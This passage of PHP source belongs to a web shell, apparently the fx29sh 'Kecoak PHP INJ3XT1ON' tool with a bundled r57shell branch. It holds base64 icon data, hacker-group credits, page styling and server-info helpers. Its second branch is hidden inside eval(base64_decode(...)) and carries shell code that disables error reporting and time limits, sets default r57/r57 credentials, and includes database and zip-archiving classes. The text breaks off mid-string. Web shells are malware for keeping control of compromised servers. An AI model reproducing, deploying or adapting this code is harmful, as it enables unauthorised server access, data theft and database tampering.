9'.'ErmFgjDI6YyHm7AINN5cMESgSH3CBAKGo9GCwgxYrHbx/YbDYwEYfEY7Fu149s2QZxkFRQJRR+Mb'.'AQsOAA98DH8NggCEGgmAiowbGREAOw==',"small_unk"=>'R0lGODlhEAAQAKIHABpFnoap3bTL89vq/FuCvVZlhH6Ms////yH5BAHoAwcALAAAAAAQABAAAANL'.'eBfcrVCFQetgJS5bA/nRxFlGJlUFoBICZUDi6gGsYG5DWqntLZI8G4xDCApPHeMR5wL8lgbSE9rq'.'OavUqurngTm+ntuhQC6byYcEADs=',"multipage"=>"R0lGODlhCgAMAJEDAP/////3mQAAAAAAACH5BAEAAAMALAAAAAAKAAwAAAIj3IR"."pJhCODnovidAovBdMzzkixlXdlI2oZpJWEsSywLzRUAAAOw==","sort_asc"=>"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMa"."SLrcPcE9GKUaQlQ5sN5PloFLJ35OoK6q5SYAOw==","sort_desc"=>"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMb"."SLrcOjBCB4UVITgyLt5ch2mgSJZDBi7p6hIJADs=","ext_asp"=>"R0lGODdhEAAQALMAAAAAAIAAAACAAICAAAAAgIAAgACAgMDAwICAgP8AAAD/AP//AAAA//8A/wD/"."/////ywAAAAAEAAQAAAESvDISasF2N6DMNAS8Bxfl1UiOZYe9aUwgpDTq6qP/IX0Oz7AXU/1eRgI"."D6HPhzjSeLYdYabsDCWMZwhg3WWtKK4QrMHohCAS+hABADs=","ext_mp3"=>'R0lGODlhEAARALMPADE8XE6ekMSuNMDW7M1IRGRoZOXs9Ki31Y2HW3PEiFl2u19RX4ajzNmCeuew'.'pwAAACH5BAHoAw8ALAAAAAAQABEAAASI8D1Gqy0yM8O7GRSmeR2oKOJEcgN4oJJyNExSD197iAjS'.'OI2EkIFrYQqN3+cgRBA/iwLhh+MwE4HDYLeYGg4MLTNQCBi7joECcKKQC9tCV7tmhwoALV5BPMnA'.'PXk7BSc5LA4CCAUHXCcHHogChIwYbG2RkgVhOxKWCggCkgCafCkAp6inBaurEQA7',"ext_avi"=>'R0lGODlhEAAQALMMAAUFBY2OkM7T2UpKSqWoq+zz/GhoaSQkJLW4u1paWnp6ejY3NwAAAAAAAAAA'.'AAAAACH5BAHoAwwALAAAAAAQABAAAARdkMkpgVGH6poIwttkeQUBbqNQrGZGjYG6lobLWAoixHOw'.'GByDbpUrAQ6K2+AoW/0OyOMy4GtioozBgsAaqBDa08AwoxHCgMmPRzSM05R17x2SBxKn+uUCD0nW'.'fRoRADs=',"ext_cgi"=>'R0lGODlhEAAQAKIHAEhJS+q8D/7dNfnulpR/U5pqCtS5eP///yH5BAHoAwcALAAAAAAQABAAAANT'.'eLpX/K9ISItwlElBcG5BMEFSGYolVgzsYAih0Q5FF7IwjAcdcRCE021wKQB8CqCQRQAcH4SXYOck'.'EQUy2DMSMmaBEWITSBAjFZLxAliDghlkRQIAOw==',"ext_cmd"=>"R0lGODlhEAAQACIAACH5BAEAAAcALAAAAAAQABAAggAAAP///4CAgMDAwAAAgICAAP//AAAAAANI"."eLrcJzDKCYe9+AogBvlg+G2dSAQAipID5XJDIM+0zNJFkdL3DBg6HmxWMEAAhVlPBhgYdrYhDQCN"."dmrYAMn1onq/YKpjvEgAADs=","ext_cpp"=>"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANC"."WLPc9XCASScZ8MlKicobBwRkEIkVYWqT4FICoJ5v7c6s3cqrArwinE/349FiNoFw44rtlqhOL4Ra"."Eq7YrLDE7a4SADs=","ext_ini"=>"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///8DAwICAgICAAP//AAAAAAAAAANL"."aArB3ioaNkK9MNbHs6lBKIoCoI1oUJ4N4DCqqYBpuM6hq8P3hwoEgU3mawELBEaPFiAUAMgYy3VM"."SnEjgPVarHEHgrB43JvszsQEADs=","ext_diz"=>'R0lGODlhEAAQAKIHAAsZcWyPv7vT6eb0/ThOi1tukZyyy////yH5BAHoAwcALAAAAAAQABAAAANS'.'eHrTLiu6IYh5chZAJlRTI4RDcIyacXkF6gAcWaxPLFJzaNhoZYyoXQcoCMwErgCHuFP8kEVjAGkg'.'FBaqJ9CgvEYOBQK06/0qjlazuSBVr8uLBAA7',"ext_doc"=>"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///8DAwAAA/4CAgAAAAAAAAAAAAANR"."WErcrrCQQCslQA2wOwdXkIFWNVBA+nme4AZCuolnRwkwF9QgEOPAFG21A+Z4sQHO94r1eJRTJVmq"."MIOrrPSWWZRcza6kaolBCOB0WoxRud0JADs=","ext_exe"=>"R0lGODlhEwAOAKIAAAAAAP///wAAvcbGxoSEhP///wAAAAAAACH5BAEAAAUALAAAAAATAA4AAAM7"."WLTcTiWSQautBEQ1hP+gl21TKAQAio7S8LxaG8x0PbOcrQf4tNu9wa8WHNKKRl4sl+y9YBuAdEqt"."xhIAOw==","ext_h"=>"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANB"."WLPc9XCASScZ8MlKCcARRwVkEAKCIBKmNqVrq7wpbMmbbbOnrgI8F+q3w9GOQOMQGZyJOspnMkKo"."Wq/NknbbSgAAOw==","ext_hpp"=>"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANF"."WLPc9XCASScZ8MlKicobBwRkEAGCIAKEqaFqpbZnmk42/d43yroKmLADlPBis6LwKNAFj7jfaWVR"."UqUagnbLdZa+YFcCADs=","ext_htaccess"=>"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP8AAP8A/wAAgIAAgP//AAAAAAAAAAM6"."WEXW/k6RAGsjmFoYgNBbEwjDB25dGZzVCKgsR8LhSnprPQ406pafmkDwUumIvJBoRAAAlEuDEwpJ"."AAA7","ext_html"=>'R0lGODlhEAAQALMOAIyt016Itv///2Gp4uXy/c3P/MXl/mtrnC6Z4mfd/Chgk7PO9lBVhnNzc///'.'/wAAACH5BAHoAw4ALAAAAAAQABAAAASF0EkHqq1h6nuzloAgjkIwfJRIFJVxFMgHDGYQCMihe46d'.'/IiBIEEQFA4SkwHBZAaKK2RPAFAACM0nwTUFMAeD5mFBWCCpTIV6rSCbKQkFQpEw2A1lw4LRa84X'.'cn96fAg4gQgJAwwAensOAyFzCgyTAAsFgxKQAywVBZcGn3wTDKWlDaamEQA7',"ext_jpg"=>'R0lGODlhDgAQALMMACYlIC6NFLOxKnqIcbPIikWoIkVFRWllROLZUmO8NqKmoBBxCAAAAAAAAAAA'.'AAAAACH5BAHoAwwALAAAAAAOABAAAARbMKxJ6zw2iGQHFSACCpQ3CWJISmaBCsABcouJiECOIkVg'.'7gadiBXoAXc9X/LGRBASvUEPmiA4qUXpFPpMZrHQojchJZjDVOpgoGib3+82W8Gu0+nrGD2Y4wcN'.'EQA7',"ext_js"=>'R0lGODlhDwAQAKIEAB4eHZ6eaOLih2BgWQAAAAAAAAAAAAAAACH5BAHoAwQALAAAAAAPABAAAANP'.'SAoR8nAARcZ4rQkr68VCI1nTB4Vj0H1iALzwpIUY3FXOKb4UwYSqDODmY+ROREtmkEFNhqKRyfV7'.'SFzHEQR62qSAnBxJoVSlxhRJLEZJAAA7',"ext_lnk"=>'R0lGODlhEAAQAKIHAAAFACOPE2TNNj60IQRKAojuVgdlBAAAACH5BAHoAwcALAAAAAAQABAAAANO'.'eGfcbkCpQOu4AkZlLM5AKHlCqW3TVw4hmqqlKB3UKhQF6AZ2ibM7Ew+Xk6UIoQAROAsgQ4RbIWBc'.'tBbSq0RruD1dB1S3BZ5ZteYZ2ZwAADs=',"ext_log"=>"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAMDAwICAgICAAAAAgAAA////AAAA"."AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARQEKEwK6UyBzC475gEAltJklLRAWzbClRhrK4Ly5yg7/wN"."zLUaLGBQBV2EgFLV4xEOSSWt9gQQBpRpqxoVNaPKkFb5Eh/LmUGzF5qE3+EMIgIAOw==","ext_php"=>'R0lGODlhEAAQAIABAP///////yH5BAHoAwEALAAAAAAQABAAAAIohI8Jwe0Po5wNsRWWxbl3blSe'.'VmHmMWZouj2md7kxB8cfhec6pPRHAQA7',"ext_pl"=>"R0lGODlhFAAUAKL/AP/4/8DAwH9/AP/4AL+/vwAAAAAAAAAAACH5BAEAAAEALAAAAAAUABQAQAMo"."GLrc3gOAMYR4OOudreegRlBWSJ1lqK5s64LjWF3cQMjpJpDf6//ABAA7","ext_swf"=>"R0lGODlhFAAUAMQRAP+cnP9SUs4AAP+cAP/OAIQAAP9jAM5jnM6cY86cnKXO98bexpwAAP8xAP/O"."nAAAAP///////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA"."ABEALAAAAAAUABQAAAV7YCSOZGme6PmsbMuqUCzP0APLzhAbuPnQAweE52g0fDKCMGgoOm4QB4GA"."GBgaT2gMQYgVjUfST3YoFGKBRgBqPjgYDEFxXRpDGEIA4xAQQNR1NHoMEAACABFhIz8rCncMAGgC"."NysLkDOTSCsJNDJanTUqLqM2KaanqBEhADs=","ext_tar"=>'R0lGODlhEAAQAKIFABokHymwoKiYkKIYbdzo4wAAAAAAAAAAACH5BAHoAwUALAAAAAAQABAAAAM4'.'CLrcJVCMSesAJJOhY7waAUgWhWljo67rE7FMGGhzYNtnNt48HsJAlgsSzIlovYAxlfShBMVoIQEA'.'Ow==',"ext_txt"=>'R0lGODlhCwAQAKIFACoqKqCeoO/z83d2brO2vwAAAAAAAAAAACH5BAHoAwUALAAAAAALABAAAAM5'.'CLM8MSBIJwNZJAhNRBdDR3xCCYqkGXppuZrwuVWj21mVJo+jZG812Cv288VWD+KQtQA4m4CCdJoA'.'ADs=',"ext_wri"=>"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAICAgMDAwICAAAAAgAAA////AAAA"."AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRUMhJkb0C6K2HuEiRcdsAfKExkkDgBoVxstwAAypduoao"."a4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxgzW6nLdq49hIBADs=","ext_xml"=>"R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA"."gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"."AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx"."OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ"."IQA7");return $images;}function sh_name(){return "--==[Kecoak PHP INJ3XT1ON]==--";}function fx29sh_tools(){bar_header(".: TooLz :.");}function fx29sh_about(){bar_header(".: Credits :.");echo "Idea, leader & coder: <b>tristram [CCTeaM]</b><br>"."Beta-tester & tips: <b>NukLeoN [AnTiSh@Re tEaM]</b><br>"."Re-coder, Designer, Windows Fix, PHP Mailer & PHP Filesystem: <b>FaTaLisTiCz_Fx [FeeLCoMz CoMMuNiTy]</b><br>"."<br>"."Please report bugs to <a href=\"mailto:feelcomz@yahoo.co.id\">FaTaLisTiCz_Fx</a></b>\n";}function html_style(){$style='<html>
<head>
	<style>
		table {width: 100%;border-collapse: collapse;}
		#main, #maininfo {width: 900px;}
		body, table, input, select, option, .info
		{
			font: 8pt tahoma;
		}
		.footer {font: 7pt tahoma;}
		textarea, .code
		{
			font: 8pt Courier New;
			color: #dedbde;
			border: 1px solid #666666;
		}
		img {border: 0;}
		#maininfo img {width: 16;height: 16;}
		input, select, option {border: 1px solid #606060;}
		#maininfo, td, th {border: 1px solid #3F3F3F;}
		a {color: #5B5BFF;text-decoration: none;}
		#pagebar a, .barheader a {color: #00FF00;}
		a:hover, #pagebar a:hover {color: #3366FF;}
		.on {color: #00FF00;}
		.off, .errmsg {color: #FF0000;}
		body, table, input, select, option {color : #EEEEEE;}
		.info th {color: #969696;width: 13%;}
		.shell {font-size: 12;color: #C0C0C0;border: 0;}
		#pagebar a, .barheader, .errmsg, .on, .off
		{
			font-weight: bold;
		}
		p, form, .info, .info td, .info th, .explorer *
		{
			margin: 0;
		}
		input, #maininfo {margin: 3px;}
		#mainpanel input, #mainpanel select
		{
		  margin: 0px 2px 0px 2px;
		}
		#maininfo table, select {margin: 2px 0px 2px 0px;}
		#pagebar, .bartitle, #mainpanel {background: #474747;}
		body, textarea, .shell, input, select, option
		{
			background: #000000;
		}
		.info, .info th, .info td, input[type="label"]
		{
			background: transparent;
			border: 0;
		}
		#pagebar td, #mainpanel td, #mainpanel th, .contents th, .explorer td
		{
			border-left: 0;
			border-right: 0;
		}
		.bartitle, .barheader, input[type="submit"], input[type="button"], input[type="reset"]
		{
			color: #D0D0D0;
			background: #3F3F3F;
			border: 1px solid #202020;
			border-top: 1px solid #505050;
			border-left: 1px solid #505050;
		}
		input[type="submit"]:hover, input[type="button"]:hover, input[type="reset"]:hover
		{
			color: #00FF00;
			background: #333333;
		}
		td, .info th {vertical-align: top;}
		.explorer td {vertical-align: middle;}
		.fleft {float: left;}
		.fright {float: right;}
		.code, .fleft, .info th {text-align: left;}
		.fright, input[type="label"], #mainpanel th, .contents th
		{
			text-align: right;
		}
		#maininfo, .bartitle, .quicklaunch, .quicklaunch a, .barheader, th
		{
			text-align: center;
		}
		td, textarea, input[type="text"], .bartitle, .barheader, .code, th
		{
			padding: 3px;
		}
		.info th, .info td {padding: 0px 2px 0px 2px;}
		.quicklaunch a {padding : 0px 5px 0px 5px;}
	</style>

	<title>'.getenv("HTTP_HOST").' - '.sh_name().'</title>

</head>

<body><center>

';return $style;};function html_header(){return "<b>".sh_name()."</b><br>.: Hacker-newbie.org | kecoak-irc.net :.";}function html_footer(){return "&copy; Hacker-Newbie Community | KecoaK | kecoak@irc.byroe.net. Generated: ".round(getmicrotime()-starttime,4 )." seconds";}function disp_error($msg){echo "<div class=errmsg>$msg</div>\n";}function srv_info($title,$contents){echo "\t\t\t<tr><th>$title</th><td>:</td><td>$contents</td></tr>\n";}function srv_software($surl){$srv_software=getenv("SERVER_SOFTWARE");if(!ereg("PHP/".phpversion(),$srv_software)){$srv_software.=". PHP/".phpversion();}return str_replace("PHP/".phpversion(),"<a href=\"".$surl."act=phpinfo\" target=\"_blank\">PHP/".phpversion()."</a>",htmlspecialchars($srv_software));}function bar_header($str){echo '<div class="barheader">'.$str.'</div'."\n";}chdir($lastdir);fx29shexit();exit();"));
 }else{ 
eval(base64_decode("JGxhbmd1YWdlPSdlbmcnOyRhdXRoPTAgOyRuYW1lPSdyNTcnOyRwYXNzPSdyNTcnO2Vycm9yX3JlcG9ydGluZygwICk7c2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDAgKTtAc2V0X3RpbWVfbGltaXQoMCApO0Bpbmlfc2V0KCdtYXhfZXhlY3V0aW9uX3RpbWUnLDAgKTtAaW5pX3NldCgnb3V0cHV0X2J1ZmZlcmluZycsMCApOyRzYWZlX21vZGU9QGluaV9nZXQoJ3NhZmVfbW9kZScpOyR2ZXJzaW9uPSIxLjI0IC8gMS43LjIiO2lmKHZlcnNpb25fY29tcGFyZShwaHB2ZXJzaW9uKCksJzQuMS4wJyk9PS0xICl7JF9QT1NUPSYkX1BPU1Q7JF9HRVQ9JiRfR0VUOyRfU0VSVkVSPSYkX1NFUlZFUjt9aWYoQGdldF9tYWdpY19xdW90ZXNfZ3BjKCkpe2ZvcmVhY2goJF9QT1NUIGFzICRrPT4kdil7JF9QT1NUWyRrXT1zdHJpcHNsYXNoZXMoJHYpO31mb3JlYWNoKCRfU0VSVkVSIGFzICRrPT4kdil7JF9TRVJWRVJbJGtdPXN0cmlwc2xhc2hlcygkdik7fX1pZigkYXV0aD09MSApe2lmKCFpc3NldCgkX1NFUlZFUlsnUEhQX0FVVEhfVVNFUiddKSB8fCAkX1NFUlZFUlsnUEhQX0FVVEhfVVNFUiddIT09JG5hbWUgfHwgJF9TRVJWRVJbJ1BIUF9BVVRIX1BXJ10hPT0kcGFzcyl7aGVhZGVyKCdXV1ctQXV0aGVudGljYXRlOiBCYXNpYyByZWFsbT0icjU3c2hlbGwiJyk7aGVhZGVyKCdIVFRQLzEuMCA0MDEgVW5hdXRob3JpemVkJyk7ZXhpdCgiPGI+PGEgaHJlZj1odHRwOi8vcnN0LnZvaWQucnU+cjU3c2hlbGw8L2E+IDogQWNjZXNzIERlbmllZDwvYj4iKTt9fSRoZWFkPSc8aHRtbD4NCjxoZWFkPg0KPHRpdGxlPnI1N3NoZWxsPC90aXRsZT4NCjxtZXRhIGh0dHAtZXF1aXY9IkNvbnRlbnQtVHlwZSIgY29udGVudD0idGV4dC9odG1sOyBjaGFyc2V0PXdpbmRvd3MtMTI1MSI+DQoNCjxTVFlMRT4NCnRyIHsNCkJPUkRFUi1SSUdIVDogICNhYWFhYWEgMXB4IHNvbGlkOw0KQk9SREVSLVRPUDogICAgI2VlZWVlZSAxcHggc29saWQ7DQpCT1JERVItTEVGVDogICAjZWVlZWVlIDFweCBzb2xpZDsNCkJPUkRFUi1CT1RUT006ICNhYWFhYWEgMXB4IHNvbGlkOw0KfQ0KdGQgew0KQk9SREVSLVJJR0hUOiAgI2FhYWFhYSAxcHggc29saWQ7DQpCT1JERVItVE9QOiAgICAjZWVlZWVlIDFweCBzb2xpZDsNCkJPUkRFUi1MRUZUOiAgICNlZWVlZWUgMXB4IHNvbGlkOw0KQk9SREVSLUJPVFRPTTogI2FhYWFhYSAxcHggc29saWQ7DQp9DQoudGFibGUxIHsNCkJPUkRFUi1SSUdIVDogICNjY2NjY2MgMHB4Ow0KQk9SREVSLVRPUDogICAgI2NjY2NjYyAwcHg7DQpCT1JERVItTEVGVDogICAjY2NjY2NjIDBweDsNCkJPUkRFUi1CT1RUT006ICNjY2NjY2MgMHB4Ow0KQkFDS0dST1VORC1DT0xPUjogI0Q0RDBDODsNCn0NCi50ZDEgew0KQk9SREVSLVJJR0hUOiAgI2NjY2NjYyAwcHg7DQpCT1JERVItVE9QOiAgICAjY2NjY2NjIDBweDsNCkJPUkRFUi1MRUZUOiAgICNjY2NjY2MgMHB4Ow0KQk9SREVSLUJPVFRPTTogI2NjY2NjYyAwcHg7DQpmb250OiA3cHQgVmVyZGFuYTsNCn0NCi50cjEgew0KQk9SREVSLVJJR0hUOiAgI2NjY2NjYyAwcHg7DQpCT1JERVItVE9QOiAgICAjY2NjY2NjIDBweDsNCkJPUkRFUi1MRUZUOiAgICNjY2NjY2MgMHB4Ow0KQk9SREVSLUJPVFRPTTogI2NjY2NjYyAwcHg7DQp9DQp0YWJsZSB7DQpCT1JERVItUklHSFQ6ICAjZWVlZWVlIDFweCBvdXRzZXQ7DQpCT1JERVItVE9QOiAgICAjZWVlZWVlIDFweCBvdXRzZXQ7DQpCT1JERVItTEVGVDogICAjZWVlZWVlIDFweCBvdXRzZXQ7DQpCT1JERVItQk9UVE9NOiAjZWVlZWVlIDFweCBvdXRzZXQ7DQpCQUNLR1JPVU5ELUNPTE9SOiAjRDREMEM4Ow0KfQ0KaW5wdXQgew0KQk9SREVSLVJJR0hUOiAgI2ZmZmZmZiAxcHggc29saWQ7DQpCT1JERVItVE9QOiAgICAjOTk5OTk5IDFweCBzb2xpZDsNCkJPUkRFUi1MRUZUOiAgICM5OTk5OTkgMXB4IHNvbGlkOw0KQk9SREVSLUJPVFRPTTogI2ZmZmZmZiAxcHggc29saWQ7DQpCQUNLR1JPVU5ELUNPTE9SOiAjZTRlMGQ4Ow0KZm9udDogOHB0IFZlcmRhbmE7DQp9DQpzZWxlY3Qgew0KQk9SREVSLVJJR0hUOiAgI2ZmZmZmZiAxcHggc29saWQ7DQpCT1JERVItVE9QOiAgICAjOTk5OTk5IDFweCBzb2xpZDsNCkJPUkRFUi1MRUZUOiAgICM5OTk5OTkgMXB4IHNvbGlkOw0KQk9SREVSLUJPVFRPTTogI2ZmZmZmZiAxcHggc29saWQ7DQpCQUNLR1JPVU5ELUNPTE9SOiAjZTRlMGQ4Ow0KZm9udDogOHB0IFZlcmRhbmE7DQp9DQpzdWJtaXQgew0KQk9SREVSLVJJR0hUOiAgYnV0dG9uaGlnaGxpZ2h0IDJweCBvdXRzZXQ7DQpCT1JERVItVE9QOiAgICBidXR0b25oaWdobGlnaHQgMnB4IG91dHNldDsNCkJPUkRFUi1MRUZUOiAgIGJ1dHRvbmhpZ2hsaWdodCAycHggb3V0c2V0Ow0KQk9SREVSLUJPVFRPTTogYnV0dG9uaGlnaGxpZ2h0IDJweCBvdXRzZXQ7DQpCQUNLR1JPVU5ELUNPTE9SOiAjZTRlMGQ4Ow0Kd2lkdGg6IDMwJTsNCn0NCnRleHRhcmVhIHsNCkJPUkRFUi1SSUdIVDogICNmZmZmZmYgMXB4IHNvbGlkOw0KQk9SREVSLVRPUDogICAgIzk5OTk5OSAxcHggc29saWQ7DQpCT1JERVItTEVGVDogICAjOTk5OTk5IDFweCBzb2xpZDsNCkJPUkRFUi1CT1RUT006ICNmZmZmZmYgMXB4IHNvbGlkOw0KQkFDS0dST1VORC1DT0xPUjogI2U0ZTBkODsNCmZvbnQ6IEZpeGVkc3lzIGJvbGQ7DQp9DQpCT0RZIHsNCm1hcmdpbi10b3A6IDFweDsNCm1hcmdpbi1yaWdodDogMXB4Ow0KbWFyZ2luLWJvdHRvbTogMXB4Ow0KbWFyZ2luLWxlZnQ6IDFweDsNCn0NCkE6bGluayB7Q09MT1I6cmVkOyBURVhULURFQ09SQVRJT046IG5vbmV9DQpBOnZpc2l0ZWQgeyBDT0xPUjpyZWQ7IFRFWFQtREVDT1JBVElPTjogbm9uZX0NCkE6YWN0aXZlIHtDT0xPUjpyZWQ7IFRFWFQtREVDT1JBVElPTjogbm9uZX0NCkE6aG92ZXIge2NvbG9yOmJsdWU7VEVYVC1ERUNPUkFUSU9OOiBub25lfQ0KPC9TVFlMRT4nO2NsYXNzIGRibXlzcWx7dmFyICRjb25uaWQ9MCA7dmFyICRyZXN1bHQ9Jyc7dmFyICRlcnJvcm1zZz0nJzt2YXIgJGxhbmc9YXJyYXkoImVycjEiPT4iVW5hYmxlIHRvIHNlbGVjdCBkYXRhYmFzZSEiLCJlcnIyIj0+Ik5vIGNvbm5lY3Rpb24gdG8gdGhlIGRhdGFiYXNlISIsImVycjMiPT4iVW5hYmxlIHRvIGV4ZWN1dGUgcXVlcnk6ICIpO3ZhciAkZXJyb3JTaG93PTEgO3ZhciAkZXJyb3JFeGl0PTEgO3ZhciAkY2hhcj0iIjtmdW5jdGlvbiBkYm15c3FsKCRzZXJ2ZXIsJHVzZXIsJHBhc3N3b3JkLCRkYXRhYmFzZSwkY2hhcj1udWxsKXskdGhpcy0+Y2hhcj0oJGNoYXIhPW51bGwpPyRjaGFyOiJjcDEyNTEiOyR0aGlzLT5zZXJ2ZXI9JHNlcnZlcjskdGhpcy0+dXNlcj0kdXNlcjskdGhpcy0+cGFzc3dvcmQ9JHBhc3N3b3JkOyR0aGlzLT5kYXRhYmFzZT0kZGF0YWJhc2U7aWYoJHRoaXMtPmNvbm5pZD09MCApeyR0aGlzLT5jb25uaWQ9QG15c3FsX2Nvbm5lY3QoJHRoaXMtPnNlcnZlciwkdGhpcy0+dXNlciwkdGhpcy0+cGFzc3dvcmQpO215c3FsX3F1ZXJ5KCJTRVQgTkFNRVMgJyIuJHRoaXMtPmNoYXIuIiciKTtteXNxbF9xdWVyeSgiU0VUIENIQVJBQ1RFUiBTRVQgJyIuJHRoaXMtPmNoYXIuIiciKTtpZigkdGhpcy0+Y29ubmlkKXtpZigkdGhpcy0+ZGF0YWJhc2UhPSIiKXtpZihAbXlzcWxfc2VsZWN0X2RiKCR0aGlzLT5kYXRhYmFzZSwkdGhpcy0+Y29ubmlkKSl7cmV0dXJuICR0aGlzLT5jb25uaWQ7fWVsc2UgeyR0aGlzLT5lcnJvcm1zZz0kdGhpcy0+bGFuZ1snZXJyMSddOyR0aGlzLT5lcnJvcigpO319fWVsc2UgeyR0aGlzLT5lcnJvcm1zZz0kdGhpcy0+bGFuZ1snZXJyMiddOyR0aGlzLT5lcnJvcigpO319fWZ1bmN0aW9uIHF1ZXJ5KCRxdWVyeT0nJyl7JHRoaXMtPnJlc3VsdD0nJztpZigkcXVlcnkpeyR0aGlzLT5yZXN1bHQ9QG15c3FsX3F1ZXJ5KCRxdWVyeSwkdGhpcy0+Y29ubmlkKTt9aWYoJHRoaXMtPnJlc3VsdCl7cmV0dXJuICR0aGlzLT5yZXN1bHQ7fWVsc2UgeyR0aGlzLT5lcnJvcm1zZz0kdGhpcy0+bGFuZ1snZXJyMyddLiRxdWVyeTskdGhpcy0+ZXJyb3IoKTtmYWxzZTt9fWZ1bmN0aW9uIGZldGNocm93KCRxdWVyeT0wICl7cmV0dXJuIEBteXNxbF9mZXRjaF9hcnJheSgkcXVlcnkpO31mdW5jdGlvbiBjb3VudCgkcXVlcnk9MCApe3JldHVybiBAbXlzcWxfbnVtX3Jvd3MoJHF1ZXJ5KTt9ZnVuY3Rpb24gZXNjYXBlKCRpbnApe3JldHVybiBAbXlzcWxfZXNjYXBlX3N0cmluZygkaW5wKTt9ZnVuY3Rpb24gZXJyb3IoKXtpZigkdGhpcy0+ZXJyb3JTaG93PT0xICl7cHJpbnQgJHRoaXMtPmVycm9ybXNnO31pZigkdGhpcy0+ZXJyb3JFeGl0PT0xICl7ZXhpdCgpO319ZnVuY3Rpb24gZmV0Y2hyb3dBcnIoJHF1ZXJ5KXskcmVzdWx0PWFycmF5KCk7d2hpbGUoJGl0ZW09JHRoaXMtPmZldGNocm93KCRxdWVyeSkpeyRyZXN1bHRbXT0kaXRlbTt9cmV0dXJuICRyZXN1bHQ7fWZ1bmN0aW9uIHF1ZXJ5QXJyKCRxdWVyeSl7cmV0dXJuICR0aGlzLT5mZXRjaHJvd0FycigkdGhpcy0+cXVlcnkoJHF1ZXJ5KSk7fX1jbGFzcyB6aXBmaWxle3ZhciAkZGF0YXNlYz1hcnJheSgpO3ZhciAkY3RybF9kaXI9YXJyYXkoKTt2YXIgJGVvZl9jdHJsX2Rpcj0iXHg1MFx4NGJceDA1XHgwNlx4MDBceDAwXHgwMFx4MDAiO3ZhciAkb2xkX29mZnNldD0wIDtmdW5jdGlvbiB1bml4MkRvc1RpbWUoJHVuaXh0aW1lPTAgKXskdGltZWFycmF5PSgkdW5peHRpbWU9PTAgKT9nZXRkYXRlKCk6Z2V0ZGF0ZSgkdW5peHRpbWUpO2lmKCR0aW1lYXJyYXlbJ3llYXInXTwxOTgwICl7JHRpbWVhcnJheVsneWVhciddPTE5ODAgOyR0aW1lYXJyYXlbJ21vbiddPTEgOyR0aW1lYXJyYXlbJ21kYXknXT0xIDskdGltZWFycmF5Wydob3VycyddPTAgOyR0aW1lYXJyYXlbJ21pbnV0ZXMnXT0wIDskdGltZWFycmF5WydzZWNvbmRzJ109MCA7fXJldHVybiAoKCR0aW1lYXJyYXlbJ3llYXInXS0xOTgwICk8PDI1ICl8KCR0aW1lYXJyYXlbJ21vbiddPDwyMSApfCgkdGltZWFycmF5WydtZGF5J108PDE2ICl8KCR0aW1lYXJyYXlbJ2hvdXJzJ108PDExICl8KCR0aW1lYXJyYXlbJ21pbnV0ZXMnXTw8NSApfCgkdGltZWFycmF5WydzZWNvbmRzJ10+PjEgKTt9ZnVuY3Rpb24gYWRkRmlsZSgkZGF0YSwkbmFtZSwkdGltZT0wICl7JG5hbWU9c3RyX3JlcGxhY2UoJ1xcJywnLycsJG5hbWUpOyRkdGltZT1kZWNoZXgoJHRoaXMtPnVuaXgyRG9zVGltZSgkdGltZSkpOyRoZXhkdGltZT0nXHgnLiRkdGltZVs2IF0uJGR0aW1lWzcgXS4nXHgnLiRkdGltZVs0IF0uJGR0aW1lWzUgXS4nXHgnLiRkdGltZVsyIF0uJGR0aW1lWzMgXS4nXHgnLiRkdGltZVswIF0uJGR0aW1lWzEgXTtldmFsKCckaGV4ZHRpbWUgPSAiJy4kaGV4ZHRpbWUuJyI7Jyk7JGZyPSJceDUwXHg0Ylx4MDNceDA0IjskZnIuPSJceDE0XHgwMCI7JGZyLj0iXHgwMFx4MDAiOyRmci49Ilx4MDhceDAwIjskZnIuPSRoZXhkdGltZTskdW5jX2xlbj1zdHJsZW4oJGRhdGEpOyRjcmM9Y3JjMzIoJGRhdGEpOyR6ZGF0YT1nemNvbXByZXNzKCRkYXRhKTskemRhdGE9c3Vic3RyKHN1YnN0cigkemRhdGEsMCAsc3RybGVuKCR6ZGF0YSktNCApLDIgKTskY19sZW49c3RybGVuKCR6ZGF0YSk7JGZyLj1wYWNrKCdWJywkY3JjKTskZnIuPXBhY2soJ1YnLCRjX2xlbik7JGZyLj1wYWNrKCdWJywkdW5jX2xlbik7JGZyLj1wYWNrKCd2JyxzdHJsZW4oJG5hbWUpKTskZnIuPXBhY2soJ3YnLDAgKTskZnIuPSRuYW1lOyRmci49JHpkYXRhOyR0aGlzLT5kYXRhc2VjW109JGZyOyRjZHJlYz0iXHg1MFx4NGJceDAxXHgwMiI7JGNkcmVjLj0iXHgwMFx4MDAiOyRjZHJlYy49Ilx4MTRce